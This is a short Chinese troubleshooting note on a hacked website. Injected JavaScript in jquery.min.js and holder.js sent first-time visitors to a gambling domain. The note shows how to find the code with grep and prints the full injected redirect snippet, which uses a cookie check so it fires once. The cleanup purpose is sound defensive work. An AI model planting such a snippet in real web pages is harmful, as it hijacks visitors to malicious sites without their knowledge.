网站挂马情况处理

现象：

第一次访问网站会自动跳转到第三方菠菜页面https://sdfhu1.com/481358.html，第二次访问就不会了。

原因：

网站js文件被挂马

解决办法：

根据https://sdfhu1.com/481358.html这个域名查找被挂马的文件

grep -rn "sdfhu1.com" *

参数说明：
-r 是递归查找 
-n 是显示行号
* : 表示当前目录所有文件，也可以是某个文件名

找到了这两个文件，发现最后几行被添加了跳转第三方。

static/global/vendor/jquery/jquery.min.js:14:         window.location.href='https://sdfhu1.com/481358.html';
static/js/holder.js:2989:         window.location.href='https://sdfhu1.com/481358.html';

 参考代码

var c = document.cookie;
     if (c.indexOf('isfirstvisited=false') != -1) {
        
     }
     else {
         var d = new Date();
         d.setFullYear(d.getFullYear() + 1);
         document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString();
         window.location.href='https://sdfhu1.com/33720.html';
     }